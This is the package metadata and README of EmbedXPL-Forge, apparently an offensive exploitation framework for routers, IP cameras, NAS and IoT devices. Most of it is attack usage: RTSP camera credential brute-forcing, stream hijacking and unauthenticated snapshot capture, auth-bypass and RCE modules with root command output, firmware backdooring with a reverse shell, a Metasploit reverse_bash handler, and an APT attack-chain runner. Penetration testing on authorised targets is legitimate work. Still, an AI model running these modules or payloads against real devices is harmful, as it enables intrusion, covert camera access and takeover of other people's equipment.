Metadata-Version: 2.4
Name: embedxpl
Version: 2.15.0
Summary: Embedded & Perimeter Security Assessment Framework — 1011+ modules, 700+ CVEs, 135+ vendors. v2.15.0: Full audit of submodules/dev; ported 83 FirewallXPL-Forge perimeter modules (SonicWall/Sophos/Juniper/Zyxel/WatchGuard/pfSense/Siemens/Moxa/PaloAlto); 27 PrinterXPL-Forge modules (CUPS CVE-2024-47176 CVSS 9.9, HP, Lexmark, Kyocera, Brother); 5 Wireless/BT (BlueBorne, FragAttacks, KRACK, KR00K, SweynTooth); Daryus OT attack scenarios (oil plant, plant shutdown, fill attack).
Author-email: André Henrique <henrique.santos@uniaogeek.com.br>
Maintainer-email: André Henrique <henrique.santos@uniaogeek.com.br>
License: Copyright 2024-2026, EmbedXPL-Forge by André Henrique (@mrhenrike)
        All rights reserved.
        
        Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
        
            * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
            * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
            * Neither the name of EmbedXPL-Forge nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
        
        THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
        
        The above licensing was taken from the BSD licensing and is applied to EmbedXPL-Forge as well.
        
        EmbedXPL-Forge is provided as is, and is a royalty free open-source application.
        
        Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit.
Project-URL: Homepage, https://github.com/mrhenrike/EmbedXPL-Forge
Project-URL: Repository, https://github.com/mrhenrike/EmbedXPL-Forge
Project-URL: Documentation, https://github.com/mrhenrike/EmbedXPL-Forge/wiki
Project-URL: Bug Tracker, https://github.com/mrhenrike/EmbedXPL-Forge/issues
Project-URL: Changelog, https://github.com/mrhenrike/EmbedXPL-Forge/releases
Keywords: security,pentesting,router,iot,exploit,embedded,firmware,network-security,vulnerability-scanner,gpon,cve,ethical-hacking,red-team,routersploit,automation
Classifier: Development Status :: 4 - Beta
Classifier: Environment :: Console
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: Education
Classifier: Intended Audience :: Information Technology
Classifier: Intended Audience :: Science/Research
Classifier: Intended Audience :: System Administrators
Classifier: Intended Audience :: Telecommunications Industry
Classifier: License :: OSI Approved :: BSD License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Topic :: Security
Classifier: Topic :: System :: Networking
Classifier: Topic :: Utilities
Requires-Python: >=3.8
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: requests>=2.32.4
Requires-Dist: paramiko>=3.0
Requires-Dist: pysnmp>=4.4.12
Requires-Dist: pycryptodome>=3.18
Requires-Dist: scapy>=2.5
Requires-Dist: colorama>=0.4.6
Requires-Dist: rich>=13.0
Requires-Dist: aiohttp>=3.9
Requires-Dist: psutil>=5.9
Requires-Dist: python-nmap>=0.7.1
Requires-Dist: telnetlib3>=2.0.0; python_version >= "3.13"
Provides-Extra: nse
Requires-Dist: python-nmap>=0.7.1; extra == "nse"
Provides-Extra: ml
Requires-Dist: numpy>=1.24; extra == "ml"
Requires-Dist: scikit-learn>=1.3; extra == "ml"
Provides-Extra: ml-gpu
Requires-Dist: torch>=2.0.0; extra == "ml-gpu"
Requires-Dist: numpy>=1.24; extra == "ml-gpu"
Provides-Extra: dev
Requires-Dist: build>=1.0; extra == "dev"
Requires-Dist: twine>=5.0; extra == "dev"
Requires-Dist: flake8>=6.0; extra == "dev"
Requires-Dist: bandit>=1.7; extra == "dev"
Requires-Dist: pip-audit>=2.6; extra == "dev"
Requires-Dist: pytest>=7.0; extra == "dev"
Dynamic: license-file

# EmbedXPL-Forge

**Embedded & Perimeter Security Assessment Framework**

EmbedXPL-Forge is an open-source exploitation framework for security professionals auditing routers, switches, IP cameras, NVR/DVR, GPON ONTs, ISP CPEs, and IoT/embedded edge devices. It provides **3200+ modules** covering credential testing, vulnerability exploitation, network scanning, payload generation, RTSP camera attacks, firmware manipulation, and multi-language PolyExploit orchestration — with **680+ CVEs** mapped across **114+ vendors** and an **APT Group Attack Engine** that reproduces real-world nation-state attack chains.

> **Author:** André Henrique ([@mrhenrike](https://github.com/mrhenrike)) | [União Geek](https://github.com/Uniao-Geek)
> **Version:** 2.13.0

---

## Features

- **570+ exploit modules** — RCE, auth bypass, path traversal, info disclosure, buffer overflow, DNS hijacking, command injection, backdoor, CSRF, config decrypt, WPA/WPS keygen, factory password generators
- **88 credential modules** — dictionary attacks against FTP, SSH, Telnet, HTTP, SNMP, SFTP
- **Full RTSP camera engine** — ported from [cameradar](https://github.com/ullaakut/cameradar): route brute-force (195+ routes), credential brute-force (80+ pairs), Basic/Digest auth, RTSPS/TLS, **RTSP-over-HTTP tunnel (pure Python, RFC 2326 App-C)**, nmap/masscan/direct scanner, ONVIF WS-Discovery, M3U output
- **7 custom Nmap NSE scripts** — RTSP discovery, camera fingerprinting, Hikvision/Dahua CVE validation, default credential testing, multi-vendor CVE checks, snapshot capture (`pip install embedxpl[nse]`)
- **Firmware exploitation suite** — format detection, backdoor injection, checksum patching, vendor flash bypass (NETGEAR, TP-Link, D-Link, ASUS)
- **PolyExploit orchestrator** — runtime C/C++ compilation (gcc/clang/mingw/cross), execution of Ruby/Node.js/PHP/Bash/Perl exploits, msfconsole integration, ExploitDB/searchsploit integration
- **5 scanner modules** — AutoPwn, device-specific scanners
- **32 payload modules** — reverse/bind TCP shells for x86, x64, ARM, MIPS, Python, Perl, PHP
- **13 encoder modules** — Base64 and hex encoding for Python, PHP, Perl
- **14 generic modules** — Heartbleed, ShellShock, UPnP IGD, SNMP bruteforce, TCP Xmas, UDP amplification, CVE lookup, DNS hijack detector, AITM interceptor
- **680+ CVEs mapped** — from 2001 to 2026, covering all major vulnerability classes
- **APT Group Attack Engine** — browse and reproduce attack chains from APT28, Volt Typhoon, Sandworm, Quad7, Turla, APT40 with MITRE ATT&CK mapping
- **23 vendor-specific wordlists** — externalized default credentials per vendor (incl. ISP-specific Brazil)
- **Network discovery** — SSDP, ARP, Nmap, Masscan, Scapy fallback, OUI lookup (IEEE database), T0–T5 timing profiles
- **Session management** — persistent scan history per host (IP+MAC), resume/restart, full findings index
- **Chained autopwn modules** — multi-phase vendor-specific exploitation chains

## Supported Device Types

| Type | Coverage | Description |
|------|----------|-------------|
| **Routers / GPON ONT / CPE** | 580+ modules | SOHO routers, enterprise gateways, GPON CPE/ONT (primary focus) |
| **IP Cameras / NVR / DVR** | 60+ modules | Hikvision, Dahua, Axis, Reolink, Amcrest, Uniview, Tapo, Swann, ANNKE, Edimax, Intelbras, Grandstream, Foscam, Xiongmai OEM, MVPower, and 20+ more |
| **NAS (Network Storage)** | 20+ modules | QNAP, Synology, D-Link NAS, Zyxel NAS |
| **VPN / Firewall Appliances** | 20+ modules | Ivanti, Fortinet, SonicWall, Zyxel |
| **Switches L2/L3** | 3 modules | Managed switches (Cisco, D-Link, NETGEAR) |
| **SOHO Edge** | 9 modules | Travel routers, NAS, wireless APs |

## Supported Vendors

**Network equipment:** 2Wire · 3Com · ActionTec · Alcatel-Lucent · Alpha Networks · Arris · Aruba · Asmax · Astoria · ASUS · Belkin · BHU · Billion · Binatone · Calix · CERIO · Cisco · Cobham · Comtrend · D-Link · DD-WRT · Draytek · EasyBox (Arcadyan) · Edimax · EE BrightBox · FiberHome · Fortinet · Freebox · GL.iNet · GPON · HooToo · Huawei · Intelbras · IPFire · Juniper · LG · Linksys · Mercury · MiFi (Novatel) · MikroTik · MitraStar · Motorola · Movistar · Netcore · NETGEAR · Netsys · Observa Telecom · OpenWrt · RuggedCom · Ruijie · Seagate · SerComm · Shuttle · Sitecom · SMC · SonicWall · Starbridge · Technicolor · Tenda · Thomson · TOTOLINK · TP-Link · TRENDnet · Ubee · Ubiquiti · Unicorn · UTStarcom · Wavlink · Xiaomi · Zhone · Zoom · ZTE · ZyXEL

**Cameras / NVR / DVR:** Hikvision · Dahua · Axis · Reolink · Amcrest · Uniview (UNV) · Tapo (TP-Link) · Swann · ANNKE · Edimax · Intelbras · Grandstream · Foscam · Acti · Avigilon · Beward · Brickcom · Cisco cameras · Geuterbruck · Honeywell cameras · Jovision · Siemens cameras · Xiongmai (OEM) · Zivif · MVPower DVR · Generic P2P WiFi cameras · Generic DVR/NVR OEM

**NAS / VPN / Security:** QNAP · Synology · D-Link NAS · Zyxel NAS · Ivanti · SonicWall · Fortinet · Avocent

## Installation

### Option 1 — PyPI (recommended)

```bash
pip install embedxpl
embedxpl
```

### Option 2 — With Nmap NSE scripts

```bash
# Install EmbedXPL + NSE dependencies
pip install "embedxpl[nse]"

# Install the 7 custom NSE scripts into Nmap's scripts directory
python -m embedxpl.nse install
# or using the entry point:
embedxpl-nse install

# Verify installation
python -m embedxpl.nse list
```

> **Note:** On Linux/macOS the install step may require `sudo` to write to `/usr/share/nmap/scripts/`.
> Run: `sudo python -m embedxpl.nse install`

### Option 3 — From source

```bash
git clone https://github.com/mrhenrike/EmbedXPL-Forge.git
cd EmbedXPL-Forge
pip install -r requirements.txt
# Optional: also install NSE scripts
pip install -e ".[nse]"
python -m embedxpl.nse install
python exf.py
```

### Option 4 — Python module

```bash
pip install embedxpl
python -m embedxpl
```

## Quick Start

```bash
# Install
pip install embedxpl

# Launch interactive shell
embedxpl

# Run a specific module directly
embedxpl -m exploits/routers/tplink/wr841n_credential_disclosure_cve_2023_50224 -s target 192.168.1.1

# Network discovery
embedxpl -c "discover 192.168.1.0/24"

# RTSP camera scan + brute-force
embedxpl -m exploits/cameras/multi/rtsp_cameradar_attack -s target 192.168.1.100

# Nmap NSE quick scan (after pip install embedxpl[nse] + embedxpl-nse install)
nmap -p 554,5554,8554 --script embedxpl-rtsp-discover 192.168.1.0/24
nmap -p 80,443 --script 'embedxpl-*' 192.168.1.100
```

## Usage

### Interactive Shell

```
exf > use exploits/routers/dlink/dir_300_600_rce
exf (D-Link DIR-300 & DIR-600 RCE) > show options
exf (D-Link DIR-300 & DIR-600 RCE) > set target 192.168.1.1
exf (D-Link DIR-300 & DIR-600 RCE) > check
exf (D-Link DIR-300 & DIR-600 RCE) > run
```

### Common Commands

| Command | Description |
|---------|-------------|
| `use <module>` | Select a module |
| `show options` | Display configurable options |
| `show info` | Display module metadata and references |
| `show devices` | List supported device types |
| `set <option> <value>` | Configure an option |
| `check` | Verify if target is vulnerable |
| `run` | Execute the module |
| `search <term>` | Search modules by keyword |
| `discover [subnet] [--timing T0-T5] [--fresh]` | Scan subnet, fingerprint targets, suggest modules |
| `sessions list\|show\|delete\|export\|purge` | Manage persistent scan history per host |
| `apt` | List APT groups with reproducible attack chains |
| `apt show <group>` | View attack chain details (MITRE ATT&CK, CVEs, modules) |
| `apt search <device\|CVE>` | Find APT groups targeting a device or CVE |
| `apt run <group> [#]` | Execute APT attack chain (all or specific attack) |

### APT Group Attack Engine

```
# List all cataloged threat actors
exf > apt list

# Show APT28 attack chain details
exf > apt show apt28

# Search for groups targeting MikroTik
exf > apt search mikrotik

# Execute the full APT28 DNS hijack chain (interactive)
exf > apt run apt28

# Execute only the credential disclosure attack (#0)
exf > apt run apt28 0
```

### Network Discovery

```
# Auto-detect subnet from active interfaces and scan (default timing T3)
exf > discover

# Scan specific subnet with stealth timing
exf > discover 192.168.1.0/24 --timing T1

# Force fresh scan, ignore previous session history
exf > discover 192.168.1.0/24 --fresh
```

Discovery uses a multi-phase pipeline: ARP sweep → Nmap (multi-method host probes) → Scapy → TCP connect fallback. Results are matched against the module catalog and filtered by vendor/model. The IEEE OUI database (`embedxpl/data/oui.txt`) resolves MAC addresses to vendors with online-first lookup and local fallback. When a host exposes WiFi capabilities, the tool recommends [WirelessXPL-Forge](https://github.com/mrhenrike/WirelessXPL-Forge) for wireless-specific attacks.

**Timing profiles (T0–T5)** mirror Nmap conventions:

| Profile | Delay | Use case |
|---------|-------|----------|
| T0 | paranoid — 300s | IDS evasion |
| T1 | sneaky — 15s | Quiet audits |
| T2 | polite — 2s | Minimal impact |
| T3 | normal — 0.5s | Default |
| T4 | aggressive — 0.1s | Fast LAN scans |
| T5 | insane — 0s | CTF / lab only |

### Session Management

```
# List all hosts with scan history
exf > sessions list

# Full history for one host: tested modules, findings, timestamps
exf > sessions show 192.168.1.1

# Export session as JSON
exf > sessions export 192.168.1.1

# Delete one session
exf > sessions delete 192.168.1.1

# Purge all sessions
exf > sessions purge
```

Sessions are stored in `~/.exf_sessions/` as JSON, keyed by SHA-256 of IP+MAC. On re-discovery of a known host, already-tested modules are shown as `[Tested]` and skipped by default.

### AutoPwn Scanner

```
exf > use scanners/autopwn
exf (AutoPwn) > set target 192.168.1.0/24
exf (AutoPwn) > run
```

## RTSP Camera Engine

Full-featured RTSP attack pipeline — ported from [cameradar](https://github.com/ullaakut/cameradar) and extended with Python-native features.

### Transport Modes

| Mode | Port | Class / Method |
|------|------|---------------|
| `rtsp` | 554 | `RTSPClient(host, port)` |
| `rtsps` | 443/8443 | `RTSPClient(host, port, use_tls=True)` |
| `http` | 80/8080 | `RTSPClient(host, port, tunnel_http=True)` |
| `https` | 443/8443 | `RTSPClient(host, port, use_tls=True, tunnel_http=True)` |
| auto | any | `RTSPClient.from_scheme(host, port, "http")` |

### Attack Pipeline

```python
from embedxpl.core.rtsp.scanner  import RTSPScanner
from embedxpl.core.rtsp.attacker import RTSPAttacker
from embedxpl.core.rtsp.models   import RTSPStream

# 1. Discover RTSP-speaking hosts on the network
scanner = RTSPScanner(timeout=5.0)
hosts = scanner.scan_network("192.168.1.0/24", ports=[554, 5554, 8554])
# Returns: [('192.168.1.100', 554), ('192.168.1.101', 8554), ...]

# 2. Run full 5-phase attack pipeline
attacker = RTSPAttacker(timeout=5.0)
results = attacker.attack_all(hosts)

# 3. Inspect results
for stream in results:
    print(stream.url)         # rtsp://admin:@192.168.1.100:554/h264/ch1/main/av_stream
    print(stream.username)    # admin
    print(stream.password)    # (empty string)
    print(stream.route)       # h264/ch1/main/av_stream
    print(stream.auth_type)   # AuthType.BASIC
    print(stream.accessible)  # True
```

**Expected output:**
```
[RTSP] Scanning 192.168.1.0/24 on ports [554, 5554, 8554]...
[RTSP] Found 3 RTSP hosts
[RTSP] 192.168.1.100:554 — Phase 1: Route discovery (195 routes)...
[RTSP] 192.168.1.100:554 — Route found: h264/ch1/main/av_stream
[RTSP] 192.168.1.100:554 — Phase 2: Auth detection → Basic (realm="IP Camera")
[RTSP] 192.168.1.100:554 — Phase 3: Credential brute-force (80 pairs)...
[RTSP] 192.168.1.100:554 — ✓ Credentials: admin:
[RTSP] 192.168.1.100:554 — Phase 4: Stream validated (200 OK)
[RTSP] Attack complete. Accessible streams: 2/3
```

### Skip-Scan Mode (Known Hosts)

```python
# Skip network scan, attack known hosts directly
hosts = scanner.skip_scan(["192.168.1.100:554", "192.168.1.101"])
# Accepts: "host:port", "host", CIDR "192.168.1-2.0-255", hostnames
```

**Expected input/output:**
```python
# Input
hosts = scanner.skip_scan(["camera.local:554", "192.168.1-2.100-110"])

# Output: [(resolved_ip, port), ...]
# [('192.168.1.100', 554), ('192.168.1.200', 554), ('192.168.1.100', 554), ...]
```

### RTSP-over-HTTP Tunnel

Used when cameras are behind HTTP proxies or corporate firewalls that block TCP/554.

```python
from embedxpl.core.rtsp.client import RTSPClient, RTSPOverHTTPTunnel

# Direct tunnel usage
tunnel = RTSPOverHTTPTunnel(host="10.0.0.50", port=8080, timeout=10.0)
response = tunnel.send_rtsp_via_http(
    "OPTIONS rtsp://10.0.0.50:8080/ RTSP/1.0\r\nCSeq: 1\r\n\r\n"
)
# Returns: raw RTSP response bytes (base64-decoded from HTTP body)

# Or via RTSPClient factory
client = RTSPClient.from_scheme("10.0.0.50", 8080, "http", timeout=10.0)
status, server, methods = client.options()  # → (200, "Hikvision NVRA", "OPTIONS, DESCRIBE, SETUP, PLAY")
```

**Expected input/output:**
```
Input : host=10.0.0.50, port=8080, scheme="http"
Output:
  status  = 200
  server  = "Hikvision IP Camera NVRA (V5.4.5)"
  methods = "OPTIONS, DESCRIBE, SETUP, PLAY, TEARDOWN"
```

### RTSP Module (Interactive)

```
embedxpl > use exploits/cameras/multi/rtsp_cameradar_attack
embedxpl (RTSP Cameradar Attack) > show options

  Option          Default    Description
  ------          -------    -----------
  target          required   Target IP/CIDR/range (e.g. 192.168.1.0/24)
  ports           554,5554,8554  RTSP ports to scan
  timeout         5          Connection timeout (seconds)
  scheme          rtsp       Transport: rtsp | rtsps | http | https
  skip_scan       false      Skip nmap discovery, attack directly
  output_m3u      false      Save accessible streams to streams.m3u
  onvif_discover  false      Enable ONVIF WS-Discovery

embedxpl (RTSP Cameradar Attack) > set target 192.168.1.0/24
embedxpl (RTSP Cameradar Attack) > set output_m3u true
embedxpl (RTSP Cameradar Attack) > run
```

---

## Nmap NSE Scripts

EmbedXPL-Forge includes 7 custom Nmap NSE scripts for IoT/camera scanning and CVE detection.

### Installation

```bash
# Install with NSE extras
pip install "embedxpl[nse]"

# Install scripts to Nmap (Linux/macOS may need sudo)
python -m embedxpl.nse install
# or
embedxpl-nse install

# Force overwrite existing scripts
python -m embedxpl.nse install --force

# Custom Nmap directory
python -m embedxpl.nse install --nse-dir /opt/homebrew/share/nmap/scripts
```

**Expected output:**
```
  [OK]   embedxpl-rtsp-discover.nse → /usr/share/nmap/scripts/embedxpl-rtsp-discover.nse
  [OK]   embedxpl-camera-identify.nse → /usr/share/nmap/scripts/embedxpl-camera-identify.nse
  [OK]   embedxpl-hikvision-vuln.nse → /usr/share/nmap/scripts/embedxpl-hikvision-vuln.nse
  [OK]   embedxpl-dahua-vuln.nse → /usr/share/nmap/scripts/embedxpl-dahua-vuln.nse
  [OK]   embedxpl-rtsp-creds.nse → /usr/share/nmap/scripts/embedxpl-rtsp-creds.nse
  [OK]   embedxpl-iot-cve-check.nse → /usr/share/nmap/scripts/embedxpl-iot-cve-check.nse
  [OK]   embedxpl-camera-snapshot.nse → /usr/share/nmap/scripts/embedxpl-camera-snapshot.nse

Installed: 7 script(s)
  [OK] nmap --script-updatedb complete
```

### List / Info

```bash
python -m embedxpl.nse list
python -m embedxpl.nse info rtsp-discover
```

### NSE Script Reference

#### `embedxpl-rtsp-discover` — RTSP Service Discovery

Detects RTSP services, grabs the `Server:` banner, identifies vendor, lists supported methods, and cross-references known CVEs.

```bash
# Basic usage
nmap -p 554,5554,8554 --script embedxpl-rtsp-discover 192.168.1.0/24

# With custom timeout
nmap -p 554,5554,8554 --script embedxpl-rtsp-discover --script-args rtsp.timeout=3 192.168.1.0/24
```

**Expected output:**
```
554/tcp open rtsp
| embedxpl-rtsp-discover:
|   Status : 200
|   Server : Hikvision IP Camera NVRA (V5.4.5)
|   Methods: OPTIONS, DESCRIBE, SETUP, PLAY, TEARDOWN
|   Vendor : Hikvision
|   Known CVEs: CVE-2021-36260 (RCE, CVSS 9.8), CVE-2017-7921 (Auth Bypass)
|   EmbedXPL module: exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|   Exploit hint: embedxpl > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|_  Full attack: embedxpl > use exploits/cameras/multi/rtsp_cameradar_attack
```

---

#### `embedxpl-camera-identify` — Deep Camera Fingerprinting

Multi-protocol identification: probes HTTP/HTTPS web UI, RTSP banner, and ONVIF. Extracts vendor, model, firmware, serial, and MAC.

```bash
nmap -p 80,443,554,37777 --script embedxpl-camera-identify 192.168.1.100
nmap -sV -p- --script embedxpl-camera-identify 192.168.1.0/24
```

**Expected output (Hikvision):**
```
80/tcp open http
| embedxpl-camera-identify:
|   Protocol : HTTP (HTTP 200)
|   Vendor   : Hikvision
|   Model    : DS-2CD2143G0-I
|   Firmware : V5.6.2 build 190401
|   Serial   : DS-2CD2143G0-I20190401AAWRA123456789
|   CVEs     : CVE-2021-36260 (RCE, CVSS 9.8) | CVE-2017-7921 (Auth Bypass)
|   Vuln assessment: LIKELY VULNERABLE (endpoint accessible without auth)
|   EmbedXPL module: exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|_  Run exploit: embedxpl > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
```

---

#### `embedxpl-hikvision-vuln` — Hikvision CVE Checker

Active validation of CVE-2021-36260 (RCE via `/SDK/webLanguage`, CVSS 9.8) and CVE-2017-7921 (auth bypass snapshot).

```bash
nmap -p 80,443,8080 --script embedxpl-hikvision-vuln 192.168.1.100
nmap -p 80,443,8080 --script embedxpl-hikvision-vuln --script-args timeout=10 192.168.1.0/24
```

**Expected output:**
```
80/tcp open http
| embedxpl-hikvision-vuln:
|   Device          : DS-2CD2143G0-I
|   Firmware        : V5.3.0 build 170112
|   CVE-2021-36260  : VULNERABLE — endpoint accepts PUT without authentication (CVE-2021-36260, CVSS 9.8)
|   CVE-2017-7921   : VULNERABLE — snapshot captured without valid credentials (CVE-2017-7921)
|   EmbedXPL RCE module  : exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|   EmbedXPL Auth Bypass : exploits/cameras/hikvision/info_disclosure_cve_2017_7921
|_  Run full exploit: embedxpl > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
```

---

#### `embedxpl-dahua-vuln` — Dahua CVE Checker

Tests CVE-2021-33044 (auth bypass, CVSS 9.8), CVE-2020-25078 (user disclosure), CVE-2013-6117 (legacy DVR). Also covers Dahua OEMs: Amcrest, Intelbras, TVT, Jovision, ANNKE.

```bash
nmap -p 80,37777 --script embedxpl-dahua-vuln 192.168.1.0/24
```

**Expected output:**
```
80/tcp open http
| embedxpl-dahua-vuln:
|   Vendor         : Dahua (or Dahua-OEM: Amcrest / Intelbras / TVT)
|   CVE-2021-33044 : VULNERABLE — snapshot captured via Digest bypass (CVE-2021-33044, CVSS 9.8)
|   CVE-2020-25078 : VULNERABLE — Users disclosed: [admin, operator]
|   CVE-2013-6117  : NOT VULNERABLE
|   EmbedXPL Auth Bypass  : exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
|   EmbedXPL Cred Extract : exploits/cameras/dahua/cctv_37777_credential_extraction
|_  Run exploit: embedxpl > use exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
```

---

#### `embedxpl-rtsp-creds` — RTSP Default Credential Tester

Tests 18 default credential pairs across 9+ common RTSP routes using Basic auth. Reports the first match.

```bash
nmap -p 554,5554,8554 --script embedxpl-rtsp-creds 192.168.1.100

# With custom route hint
nmap -p 554 --script embedxpl-rtsp-creds --script-args rtsp.route=live.sdp 192.168.1.100
```

**Expected output:**
```
554/tcp open rtsp
| embedxpl-rtsp-creds:
|   Server           : Hikvision IP Camera NVRA
|   Credential found : admin: (empty password)
|   Stream URL       : rtsp://admin:@192.168.1.100:554/h264/ch1/main/av_stream
|   Auth type        : Basic
|   Response code    : 200
|   EmbedXPL full scan : exploits/cameras/multi/rtsp_cameradar_attack
|_  Run exploit: embedxpl > use exploits/cameras/multi/rtsp_cameradar_attack
```

---

#### `embedxpl-iot-cve-check` — Multi-Vendor CVE Fingerprint

Detects and validates 10 active CVEs across Hikvision, Dahua, D-Link NAS, Reolink, Uniview, QNAP, SonicWall, and GPON.

```bash
nmap -p 80,443,8080 --script embedxpl-iot-cve-check 192.168.1.0/24
```

**Expected output:**
```
80/tcp open http
| embedxpl-iot-cve-check:
|   CVE-2021-36260 (Hikvision, CVSS 9.8): POSSIBLY VULNERABLE — HTTP 200 returned
|     → EmbedXPL: CVE-2021-36260 : use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|   CVE-2021-33044 (Dahua, CVSS 9.8)   : NOT VULNERABLE — HTTP 404
|   EmbedXPL-Forge: https://github.com/mrhenrike/EmbedXPL-Forge
|_  Full exploitation: pip install embedxpl && embedxpl
```

---

#### `embedxpl-camera-snapshot` — Unauthenticated Snapshot Access

Probes 16 vendor-specific snapshot endpoints. Reports any URL returning `image/*` without credentials. Optionally saves JPEG files locally.

```bash
nmap -p 80,443,8080 --script embedxpl-camera-snapshot 192.168.1.100

# Save snapshots to disk
nmap -p 80 --script embedxpl-camera-snapshot --script-args outdir=/tmp/snaps 192.168.1.0/24
```

**Expected output:**
```
80/tcp open http
| embedxpl-camera-snapshot:
|   Endpoint 1 (Dahua):
|     URL          : http://192.168.1.100:80/cgi-bin/snapshot.cgi?channel=1
|     Content-Type : image/jpeg
|     Size         : 45231 bytes
|     Access       : UNAUTHENTICATED SNAPSHOT ACCESS
|     EmbedXPL module: exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
|_    Run exploit: embedxpl > use exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
```

### Run All NSE Scripts via Python

```bash
# Run all scripts via embedxpl-nse CLI
python -m embedxpl.nse run --target 192.168.1.0/24 --scripts all

# Run specific scripts
python -m embedxpl.nse run --target 192.168.1.100 --scripts rtsp-discover,hikvision-vuln

# With output file
python -m embedxpl.nse run --target 192.168.1.0/24 --scripts all --output /tmp/scan.txt

# Custom ports
python -m embedxpl.nse run --target 192.168.1.0/24 --scripts all --ports 80,443,554,5554,8080,8554
```

**Uninstall:**
```bash
python -m embedxpl.nse uninstall
```

---

## Firmware Exploitation

```
embedxpl > use exploits/firmware/netgear_firmware_flash
embedxpl (NETGEAR Firmware Flash) > set target 192.168.1.1
embedxpl (NETGEAR Firmware Flash) > set firmware /path/to/backdoored.bin
embedxpl (NETGEAR Firmware Flash) > set lhost 10.0.0.10
embedxpl (NETGEAR Firmware Flash) > set lport 4444
embedxpl (NETGEAR Firmware Flash) > run
```

**What it does:**
1. Detects firmware format (TRX, DLOB, SEAMA, WRGG, raw binary)
2. Injects reverse shell backdoor at a suitable offset
3. Recalculates CRC32/MD5 checksum
4. Uploads via vendor-specific flash endpoint (bypassing auth where applicable)
5. Waits for device reboot and verifies backdoor execution

---

## PolyExploit Orchestrator

Enables runtime C/C++ compilation and multi-language script execution for exploits not portable to pure Python.

### C/C++ Runtime Compilation

```python
from embedxpl.core.poly import CCompiler

compiler = CCompiler()

# Check available compilers
print(compiler.compiler_available())  # {'gcc': True, 'clang': False, 'mingw': False}

# Compile a C PoC exploit at runtime
binary = compiler.compile_c(
    source="""
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
    // Stack overflow PoC
    char buf[64];
    memcpy(buf, argv[1], atoi(argv[2]));
    return 0;
}
""",
    arch="x86",   # x86, x64, arm, mips, mingw
)
# Returns: Path to compiled binary (cached by source hash)

# Execute with arguments
output = compiler.run_binary(binary, args=["AAAA"*100, "400"])
print(output.stdout)
```

### Multi-Language Script Execution

```python
from embedxpl.core.poly import PolyRunner

runner = PolyRunner()
print(runner.available_runtimes())
# {'ruby': True, 'node': True, 'php': True, 'bash': True, 'perl': True}

# Execute a Ruby exploit
result = runner.run_ruby("""
require 'net/http'
resp = Net::HTTP.get_response(URI('http://192.168.1.1/cgi-bin/exploit'))
puts resp.body
""", args=["192.168.1.1"])

# Metasploit integration
runner.run_metasploit(module="exploit/multi/handler", options={
    "PAYLOAD": "cmd/unix/reverse_bash",
    "LHOST": "10.0.0.10",
    "LPORT": "4444",
})

# ExploitDB / searchsploit lookup
results = runner.searchsploit("hikvision rtsp")
for r in results:
    print(r["Title"], r["Path"])
```

---

## New in v2.13.0 — routerpwn.com Gap Coverage

27 new exploit modules from a complete audit of [routerpwn.com](https://github.com/hkm/routerpwn.com) and [routerPWN](https://github.com/lilloX/routerPWN). Key examples:

```
# EasyBox (Arcadyan) — WPA2 default key from MAC (factory algorithm)
exf > use exploits/routers/easybox/easybox_wpa_keygen
exf (EasyBox WPA Keygen) > set target 192.168.1.1
exf (EasyBox WPA Keygen) > run
[*] No MAC supplied — attempting to extract from web UI...
[+] MAC found: AA:BB:CC:DD:EE:FF
[+] Device MAC  : AA:BB:CC:DD:EE:FF
[+] WPA2 PSK    : 3f2d9a1b

# Seagate NAS — Ghost PHP unauthenticated RCE (CVE-2014-8684)
exf > use exploits/routers/seagate/seagate_nas_php_backdoor
exf (Seagate Ghost PHP) > set target 192.168.1.100
exf (Seagate Ghost PHP) > set cmd "id; uname -a"
exf (Seagate Ghost PHP) > run
[*] Sending command via Ghost PHP backdoor: 'id; uname -a'
[+] RCE successful — output:
    uid=0(root) gid=0(root) groups=0(root)
    Linux NAS 3.10.14 #1 SMP armv7l

# Alpha Networks / ZTE — web_shell_cmd.gch backdoor
exf > use exploits/routers/alpha_networks/web_shell_cmd_rce
exf (Alpha Networks web_shell_cmd RCE) > set target 192.168.1.1
